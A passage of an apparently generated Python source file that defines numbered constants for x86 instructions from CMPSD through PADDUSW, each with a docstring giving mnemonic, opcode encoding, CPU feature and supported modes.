``VCMPPD k1 {k2}, zmm2, zmm3/m512/m64bcst{sae}, imm8``
``EVEX.512.66.0F.W1 C2 /r ib``
``AVX512F``
``16/32/64-bit``
"""
CMPSS_XMM_XMMM32_IMM8: int = 2152
"""
``CMPSS xmm1, xmm2/m32, imm8``
``F3 0F C2 /r ib``
``SSE``
``16/32/64-bit``
"""
VEX_VCMPSS_XMM_XMM_XMMM32_IMM8: int = 2153
"""
``VCMPSS xmm1, xmm2, xmm3/m32, imm8``
``VEX.LIG.F3.0F.WIG C2 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VCMPSS_KR_K1_XMM_XMMM32_IMM8_SAE: int = 2154
"""
``VCMPSS k1 {k2}, xmm2, xmm3/m32{sae}, imm8``
``EVEX.LIG.F3.0F.W0 C2 /r ib``
``AVX512F``
``16/32/64-bit``
"""
CMPSD_XMM_XMMM64_IMM8: int = 2155
"""
``CMPSD xmm1, xmm2/m64, imm8``
``F2 0F C2 /r ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VCMPSD_XMM_XMM_XMMM64_IMM8: int = 2156
"""
``VCMPSD xmm1, xmm2, xmm3/m64, imm8``
``VEX.LIG.F2.0F.WIG C2 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VCMPSD_KR_K1_XMM_XMMM64_IMM8_SAE: int = 2157
"""
``VCMPSD k1 {k2}, xmm2, xmm3/m64{sae}, imm8``
``EVEX.LIG.F2.0F.W1 C2 /r ib``
``AVX512F``
``16/32/64-bit``
"""
MOVNTI_M32_R32: int = 2158
"""
``MOVNTI m32, r32``
``NP 0F C3 /r``
``SSE2``
``16/32/64-bit``
"""
MOVNTI_M64_R64: int = 2159
"""
``MOVNTI m64, r64``
``NP o64 0F C3 /r``
``SSE2``
``64-bit``
"""
PINSRW_MM_R32M16_IMM8: int = 2160
"""
``PINSRW mm, r32/m16, imm8``
``NP 0F C4 /r ib``
``SSE``
``16/32/64-bit``
"""
PINSRW_MM_R64M16_IMM8: int = 2161
"""
``PINSRW mm, r64/m16, imm8``
``NP o64 0F C4 /r ib``
``SSE``
``64-bit``
"""
PINSRW_XMM_R32M16_IMM8: int = 2162
"""
``PINSRW xmm, r32/m16, imm8``
``66 0F C4 /r ib``
``SSE2``
``16/32/64-bit``
"""
PINSRW_XMM_R64M16_IMM8: int = 2163
"""
``PINSRW xmm, r64/m16, imm8``
``66 o64 0F C4 /r ib``
``SSE2``
``64-bit``
"""
VEX_VPINSRW_XMM_XMM_R32M16_IMM8: int = 2164
"""
``VPINSRW xmm1, xmm2, r32/m16, imm8``
``VEX.128.66.0F.W0 C4 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPINSRW_XMM_XMM_R64M16_IMM8: int = 2165
"""
``VPINSRW xmm1, xmm2, r64/m16, imm8``
``VEX.128.66.0F.W1 C4 /r ib``
``AVX``
``64-bit``
"""
EVEX_VPINSRW_XMM_XMM_R32M16_IMM8: int = 2166
"""
``VPINSRW xmm1, xmm2, r32/m16, imm8``
``EVEX.128.66.0F.W0 C4 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPINSRW_XMM_XMM_R64M16_IMM8: int = 2167
"""
``VPINSRW xmm1, xmm2, r64/m16, imm8``
``EVEX.128.66.0F.W1 C4 /r ib``
``AVX512BW``
``64-bit``
"""
PEXTRW_R32_MM_IMM8: int = 2168
"""
``PEXTRW r32, mm, imm8``
``NP 0F C5 /r ib``
``SSE``
``16/32/64-bit``
"""
PEXTRW_R64_MM_IMM8: int = 2169
"""
``PEXTRW r64, mm, imm8``
``NP o64 0F C5 /r ib``
``SSE``
``64-bit``
"""
PEXTRW_R32_XMM_IMM8: int = 2170
"""
``PEXTRW r32, xmm, imm8``
``66 0F C5 /r ib``
``SSE2``
``16/32/64-bit``
"""
PEXTRW_R64_XMM_IMM8: int = 2171
"""
``PEXTRW r64, xmm, imm8``
``66 o64 0F C5 /r ib``
``SSE2``
``64-bit``
"""
VEX_VPEXTRW_R32_XMM_IMM8: int = 2172
"""
``VPEXTRW r32, xmm1, imm8``
``VEX.128.66.0F.W0 C5 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPEXTRW_R64_XMM_IMM8: int = 2173
"""
``VPEXTRW r64, xmm1, imm8``
``VEX.128.66.0F.W1 C5 /r ib``
``AVX``
``64-bit``
"""
EVEX_VPEXTRW_R32_XMM_IMM8: int = 2174
"""
``VPEXTRW r32, xmm1, imm8``
``EVEX.128.66.0F.W0 C5 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPEXTRW_R64_XMM_IMM8: int = 2175
"""
``VPEXTRW r64, xmm1, imm8``
``EVEX.128.66.0F.W1 C5 /r ib``
``AVX512BW``
``64-bit``
"""
SHUFPS_XMM_XMMM128_IMM8: int = 2176
"""
``SHUFPS xmm1, xmm2/m128, imm8``
``NP 0F C6 /r ib``
``SSE``
``16/32/64-bit``
"""
VEX_VSHUFPS_XMM_XMM_XMMM128_IMM8: int = 2177
"""
``VSHUFPS xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.0F.WIG C6 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VSHUFPS_YMM_YMM_YMMM256_IMM8: int = 2178
"""
``VSHUFPS ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.0F.WIG C6 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VSHUFPS_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 2179
"""
``VSHUFPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst, imm8``
``EVEX.128.0F.W0 C6 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSHUFPS_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 2180
"""
``VSHUFPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.0F.W0 C6 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSHUFPS_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 2181
"""
``VSHUFPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst, imm8``
``EVEX.512.0F.W0 C6 /r ib``
``AVX512F``
``16/32/64-bit``
"""
SHUFPD_XMM_XMMM128_IMM8: int = 2182
"""
``SHUFPD xmm1, xmm2/m128, imm8``
``66 0F C6 /r ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VSHUFPD_XMM_XMM_XMMM128_IMM8: int = 2183
"""
``VSHUFPD xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F.WIG C6 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VSHUFPD_YMM_YMM_YMMM256_IMM8: int = 2184
"""
``VSHUFPD ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F.WIG C6 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VSHUFPD_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 2185
"""
``VSHUFPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F.W1 C6 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSHUFPD_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 2186
"""
``VSHUFPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F.W1 C6 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSHUFPD_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 2187
"""
``VSHUFPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst, imm8``
``EVEX.512.66.0F.W1 C6 /r ib``
``AVX512F``
``16/32/64-bit``
"""
CMPXCHG8B_M64: int = 2188
"""
``CMPXCHG8B m64``
``0F C7 /1``
``CX8``
``16/32/64-bit``
"""
CMPXCHG16B_M128: int = 2189
"""
``CMPXCHG16B m128``
``o64 0F C7 /1``
``CMPXCHG16B``
``64-bit``
"""
XRSTORS_MEM: int = 2190
"""
``XRSTORS mem``
``NP 0F C7 /3``
``XSAVES``
``16/32/64-bit``
"""
XRSTORS64_MEM: int = 2191
"""
``XRSTORS64 mem``
``NP o64 0F C7 /3``
``XSAVES``
``64-bit``
"""
XSAVEC_MEM: int = 2192
"""
``XSAVEC mem``
``NP 0F C7 /4``
``XSAVEC``
``16/32/64-bit``
"""
XSAVEC64_MEM: int = 2193
"""
``XSAVEC64 mem``
``NP o64 0F C7 /4``
``XSAVEC``
``64-bit``
"""
XSAVES_MEM: int = 2194
"""
``XSAVES mem``
``NP 0F C7 /5``
``XSAVES``
``16/32/64-bit``
"""
XSAVES64_MEM: int = 2195
"""
``XSAVES64 mem``
``NP o64 0F C7 /5``
``XSAVES``
``64-bit``
"""
VMPTRLD_M64: int = 2196
"""
``VMPTRLD m64``
``NP 0F C7 /6``
``VMX``
``16/32/64-bit``
"""
VMCLEAR_M64: int = 2197
"""
``VMCLEAR m64``
``66 0F C7 /6``
``VMX``
``16/32/64-bit``
"""
VMXON_M64: int = 2198
"""
``VMXON m64``
``F3 0F C7 /6``
``VMX``
``16/32/64-bit``
"""
RDRAND_R16: int = 2199
"""
``RDRAND r16``
``o16 0F C7 /6``
``RDRAND``
``16/32/64-bit``
"""
RDRAND_R32: int = 2200
"""
``RDRAND r32``
``o32 0F C7 /6``
``RDRAND``
``16/32/64-bit``
"""
RDRAND_R64: int = 2201
"""
``RDRAND r64``
``o64 0F C7 /6``
``RDRAND``
``64-bit``
"""
VMPTRST_M64: int = 2202
"""
``VMPTRST m64``
``NP 0F C7 /7``
``VMX``
``16/32/64-bit``
"""
RDSEED_R16: int = 2203
"""
``RDSEED r16``
``o16 0F C7 /7``
``RDSEED``
``16/32/64-bit``
"""
RDSEED_R32: int = 2204
"""
``RDSEED r32``
``o32 0F C7 /7``
``RDSEED``
``16/32/64-bit``
"""
RDSEED_R64: int = 2205
"""
``RDSEED r64``
``o64 0F C7 /7``
``RDSEED``
``64-bit``
"""
RDPID_R32: int = 2206
"""
``RDPID r32``
``F3 0F C7 /7``
``RDPID``
``16/32-bit``
"""
RDPID_R64: int = 2207
"""
``RDPID r64``
``F3 0F C7 /7``
``RDPID``
``64-bit``
"""
BSWAP_R16: int = 2208
"""
``BSWAP r16``
``o16 0F C8+rw``
``486+``
``16/32/64-bit``
"""
BSWAP_R32: int = 2209
"""
``BSWAP r32``
``o32 0F C8+rd``
``486+``
``16/32/64-bit``
"""
BSWAP_R64: int = 2210
"""
``BSWAP r64``
``o64 0F C8+ro``
``X64``
``64-bit``
"""
ADDSUBPD_XMM_XMMM128: int = 2211
"""
``ADDSUBPD xmm1, xmm2/m128``
``66 0F D0 /r``
``SSE3``
``16/32/64-bit``
"""
VEX_VADDSUBPD_XMM_XMM_XMMM128: int = 2212
"""
``VADDSUBPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG D0 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VADDSUBPD_YMM_YMM_YMMM256: int = 2213
"""
``VADDSUBPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG D0 /r``
``AVX``
``16/32/64-bit``
"""
ADDSUBPS_XMM_XMMM128: int = 2214
"""
``ADDSUBPS xmm1, xmm2/m128``
``F2 0F D0 /r``
``SSE3``
``16/32/64-bit``
"""
VEX_VADDSUBPS_XMM_XMM_XMMM128: int = 2215
"""
``VADDSUBPS xmm1, xmm2, xmm3/m128``
``VEX.128.F2.0F.WIG D0 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VADDSUBPS_YMM_YMM_YMMM256: int = 2216
"""
``VADDSUBPS ymm1, ymm2, ymm3/m256``
``VEX.256.F2.0F.WIG D0 /r``
``AVX``
``16/32/64-bit``
"""
PSRLW_MM_MMM64: int = 2217
"""
``PSRLW mm, mm/m64``
``NP 0F D1 /r``
``MMX``
``16/32/64-bit``
"""
PSRLW_XMM_XMMM128: int = 2218
"""
``PSRLW xmm1, xmm2/m128``
``66 0F D1 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRLW_XMM_XMM_XMMM128: int = 2219
"""
``VPSRLW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG D1 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRLW_YMM_YMM_XMMM128: int = 2220
"""
``VPSRLW ymm1, ymm2, xmm3/m128``
``VEX.256.66.0F.WIG D1 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRLW_XMM_K1Z_XMM_XMMM128: int = 2221
"""
``VPSRLW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG D1 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRLW_YMM_K1Z_YMM_XMMM128: int = 2222
"""
``VPSRLW ymm1 {k1}{z}, ymm2, xmm3/m128``
``EVEX.256.66.0F.WIG D1 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRLW_ZMM_K1Z_ZMM_XMMM128: int = 2223
"""
``VPSRLW zmm1 {k1}{z}, zmm2, xmm3/m128``
``EVEX.512.66.0F.WIG D1 /r``
``AVX512BW``
``16/32/64-bit``
"""
PSRLD_MM_MMM64: int = 2224
"""
``PSRLD mm, mm/m64``
``NP 0F D2 /r``
``MMX``
``16/32/64-bit``
"""
PSRLD_XMM_XMMM128: int = 2225
"""
``PSRLD xmm1, xmm2/m128``
``66 0F D2 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRLD_XMM_XMM_XMMM128: int = 2226
"""
``VPSRLD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG D2 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRLD_YMM_YMM_XMMM128: int = 2227
"""
``VPSRLD ymm1, ymm2, xmm3/m128``
``VEX.256.66.0F.WIG D2 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRLD_XMM_K1Z_XMM_XMMM128: int = 2228
"""
``VPSRLD xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.W0 D2 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLD_YMM_K1Z_YMM_XMMM128: int = 2229
"""
``VPSRLD ymm1 {k1}{z}, ymm2, xmm3/m128``
``EVEX.256.66.0F.W0 D2 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLD_ZMM_K1Z_ZMM_XMMM128: int = 2230
"""
``VPSRLD zmm1 {k1}{z}, zmm2, xmm3/m128``
``EVEX.512.66.0F.W0 D2 /r``
``AVX512F``
``16/32/64-bit``
"""
PSRLQ_MM_MMM64: int = 2231
"""
``PSRLQ mm, mm/m64``
``NP 0F D3 /r``
``MMX``
``16/32/64-bit``
"""
PSRLQ_XMM_XMMM128: int = 2232
"""
``PSRLQ xmm1, xmm2/m128``
``66 0F D3 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSRLQ_XMM_XMM_XMMM128: int = 2233
"""
``VPSRLQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG D3 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSRLQ_YMM_YMM_XMMM128: int = 2234
"""
``VPSRLQ ymm1, ymm2, xmm3/m128``
``VEX.256.66.0F.WIG D3 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSRLQ_XMM_K1Z_XMM_XMMM128: int = 2235
"""
``VPSRLQ xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.W1 D3 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLQ_YMM_K1Z_YMM_XMMM128: int = 2236
"""
``VPSRLQ ymm1 {k1}{z}, ymm2, xmm3/m128``
``EVEX.256.66.0F.W1 D3 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSRLQ_ZMM_K1Z_ZMM_XMMM128: int = 2237
"""
``VPSRLQ zmm1 {k1}{z}, zmm2, xmm3/m128``
``EVEX.512.66.0F.W1 D3 /r``
``AVX512F``
``16/32/64-bit``
"""
PADDQ_MM_MMM64: int = 2238
"""
``PADDQ mm, mm/m64``
``NP 0F D4 /r``
``MMX``
``16/32/64-bit``
"""
PADDQ_XMM_XMMM128: int = 2239
"""
``PADDQ xmm1, xmm2/m128``
``66 0F D4 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPADDQ_XMM_XMM_XMMM128: int = 2240
"""
``VPADDQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG D4 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPADDQ_YMM_YMM_YMMM256: int = 2241
"""
``VPADDQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG D4 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPADDQ_XMM_K1Z_XMM_XMMM128B64: int = 2242
"""
``VPADDQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 D4 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPADDQ_YMM_K1Z_YMM_YMMM256B64: int = 2243
"""
``VPADDQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 D4 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPADDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2244
"""
``VPADDQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 D4 /r``
``AVX512F``
``16/32/64-bit``
"""
PMULLW_MM_MMM64: int = 2245
"""
``PMULLW mm, mm/m64``
``NP 0F D5 /r``
``MMX``
``16/32/64-bit``
"""
PMULLW_XMM_XMMM128: int = 2246
"""
``PMULLW xmm1, xmm2/m128``
``66 0F D5 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPMULLW_XMM_XMM_XMMM128: int = 2247
"""
``VPMULLW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG D5 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMULLW_YMM_YMM_YMMM256: int = 2248
"""
``VPMULLW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG D5 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMULLW_XMM_K1Z_XMM_XMMM128: int = 2249
"""
``VPMULLW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG D5 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMULLW_YMM_K1Z_YMM_YMMM256: int = 2250
"""
``VPMULLW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG D5 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMULLW_ZMM_K1Z_ZMM_ZMMM512: int = 2251
"""
``VPMULLW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG D5 /r``
``AVX512BW``
``16/32/64-bit``
"""
MOVQ_XMMM64_XMM: int = 2252
"""
``MOVQ xmm2/m64, xmm1``
``66 0F D6 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVQ_XMMM64_XMM: int = 2253
"""
``VMOVQ xmm1/m64, xmm2``
``VEX.128.66.0F.WIG D6 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVQ_XMMM64_XMM: int = 2254
"""
``VMOVQ xmm1/m64, xmm2``
``EVEX.128.66.0F.W1 D6 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVQ2DQ_XMM_MM: int = 2255
"""
``MOVQ2DQ xmm, mm``
``F3 0F D6 /r``
``SSE2``
``16/32/64-bit``
"""
MOVDQ2Q_MM_XMM: int = 2256
"""
``MOVDQ2Q mm, xmm``
``F2 0F D6 /r``
``SSE2``
``16/32/64-bit``
"""
PMOVMSKB_R32_MM: int = 2257
"""
``PMOVMSKB r32, mm``
``NP 0F D7 /r``
``SSE``
``16/32/64-bit``
"""
PMOVMSKB_R64_MM: int = 2258
"""
``PMOVMSKB r64, mm``
``NP o64 0F D7 /r``
``SSE``
``64-bit``
"""
PMOVMSKB_R32_XMM: int = 2259
"""
``PMOVMSKB r32, xmm``
``66 0F D7 /r``
``SSE2``
``16/32/64-bit``
"""
PMOVMSKB_R64_XMM: int = 2260
"""
``PMOVMSKB r64, xmm``
``66 o64 0F D7 /r``
``SSE2``
``64-bit``
"""
VEX_VPMOVMSKB_R32_XMM: int = 2261
"""
``VPMOVMSKB r32, xmm1``
``VEX.128.66.0F.W0 D7 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVMSKB_R64_XMM: int = 2262
"""
``VPMOVMSKB r64, xmm1``
``VEX.128.66.0F.W1 D7 /r``
``AVX``
``64-bit``
"""
VEX_VPMOVMSKB_R32_YMM: int = 2263
"""
``VPMOVMSKB r32, ymm1``
``VEX.256.66.0F.W0 D7 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VPMOVMSKB_R64_YMM: int = 2264
"""
``VPMOVMSKB r64, ymm1``
``VEX.256.66.0F.W1 D7 /r``
``AVX2``
``64-bit``
"""
PSUBUSB_MM_MMM64: int = 2265
"""
``PSUBUSB mm, mm/m64``
``NP 0F D8 /r``
``MMX``
``16/32/64-bit``
"""
PSUBUSB_XMM_XMMM128: int = 2266
"""
``PSUBUSB xmm1, xmm2/m128``
``66 0F D8 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSUBUSB_XMM_XMM_XMMM128: int = 2267
"""
``VPSUBUSB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG D8 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSUBUSB_YMM_YMM_YMMM256: int = 2268
"""
``VPSUBUSB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG D8 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSUBUSB_XMM_K1Z_XMM_XMMM128: int = 2269
"""
``VPSUBUSB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG D8 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBUSB_YMM_K1Z_YMM_YMMM256: int = 2270
"""
``VPSUBUSB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG D8 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBUSB_ZMM_K1Z_ZMM_ZMMM512: int = 2271
"""
``VPSUBUSB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG D8 /r``
``AVX512BW``
``16/32/64-bit``
"""
PSUBUSW_MM_MMM64: int = 2272
"""
``PSUBUSW mm, mm/m64``
``NP 0F D9 /r``
``MMX``
``16/32/64-bit``
"""
PSUBUSW_XMM_XMMM128: int = 2273
"""
``PSUBUSW xmm1, xmm2/m128``
``66 0F D9 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSUBUSW_XMM_XMM_XMMM128: int = 2274
"""
``VPSUBUSW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG D9 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSUBUSW_YMM_YMM_YMMM256: int = 2275
"""
``VPSUBUSW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG D9 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSUBUSW_XMM_K1Z_XMM_XMMM128: int = 2276
"""
``VPSUBUSW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG D9 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBUSW_YMM_K1Z_YMM_YMMM256: int = 2277
"""
``VPSUBUSW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG D9 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBUSW_ZMM_K1Z_ZMM_ZMMM512: int = 2278
"""
``VPSUBUSW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG D9 /r``
``AVX512BW``
``16/32/64-bit``
"""
PMINUB_MM_MMM64: int = 2279
"""
``PMINUB mm1, mm2/m64``
``NP 0F DA /r``
``SSE``
``16/32/64-bit``
"""
PMINUB_XMM_XMMM128: int = 2280
"""
``PMINUB xmm1, xmm2/m128``
``66 0F DA /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPMINUB_XMM_XMM_XMMM128: int = 2281
"""
``VPMINUB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG DA /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMINUB_YMM_YMM_YMMM256: int = 2282
"""
``VPMINUB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG DA /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMINUB_XMM_K1Z_XMM_XMMM128: int = 2283
"""
``VPMINUB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG DA /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMINUB_YMM_K1Z_YMM_YMMM256: int = 2284
"""
``VPMINUB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG DA /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMINUB_ZMM_K1Z_ZMM_ZMMM512: int = 2285
"""
``VPMINUB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG DA /r``
``AVX512BW``
``16/32/64-bit``
"""
PAND_MM_MMM64: int = 2286
"""
``PAND mm, mm/m64``
``NP 0F DB /r``
``MMX``
``16/32/64-bit``
"""
PAND_XMM_XMMM128: int = 2287
"""
``PAND xmm1, xmm2/m128``
``66 0F DB /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPAND_XMM_XMM_XMMM128: int = 2288
"""
``VPAND xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG DB /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPAND_YMM_YMM_YMMM256: int = 2289
"""
``VPAND ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG DB /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPANDD_XMM_K1Z_XMM_XMMM128B32: int = 2290
"""
``VPANDD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 DB /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPANDD_YMM_K1Z_YMM_YMMM256B32: int = 2291
"""
``VPANDD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 DB /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPANDD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2292
"""
``VPANDD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 DB /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPANDQ_XMM_K1Z_XMM_XMMM128B64: int = 2293
"""
``VPANDQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 DB /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPANDQ_YMM_K1Z_YMM_YMMM256B64: int = 2294
"""
``VPANDQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 DB /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPANDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2295
"""
``VPANDQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 DB /r``
``AVX512F``
``16/32/64-bit``
"""
PADDUSB_MM_MMM64: int = 2296
"""
``PADDUSB mm, mm/m64``
``NP 0F DC /r``
``MMX``
``16/32/64-bit``
"""
PADDUSB_XMM_XMMM128: int = 2297
"""
``PADDUSB xmm1, xmm2/m128``
``66 0F DC /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPADDUSB_XMM_XMM_XMMM128: int = 2298
"""
``VPADDUSB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG DC /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPADDUSB_YMM_YMM_YMMM256: int = 2299
"""
``VPADDUSB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG DC /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPADDUSB_XMM_K1Z_XMM_XMMM128: int = 2300
"""
``VPADDUSB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG DC /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDUSB_YMM_K1Z_YMM_YMMM256: int = 2301
"""
``VPADDUSB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG DC /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDUSB_ZMM_K1Z_ZMM_ZMMM512: int = 2302
"""
``VPADDUSB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG DC /r``
``AVX512BW``
``16/32/64-bit``
"""
PADDUSW_MM_MMM64: int = 2303
"""
``PADDUSW mm, mm/m64``
``NP 0F DD /r``
``MMX``
``16/32/64-bit``
"""
PADDUSW_XMM_XMMM128: int = 2304
"""
``PADDUSW xmm1, xmm2/m128``
``66 0F DD /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPADDUSW_XMM_XMM_XMMM128: int = 2305
"""
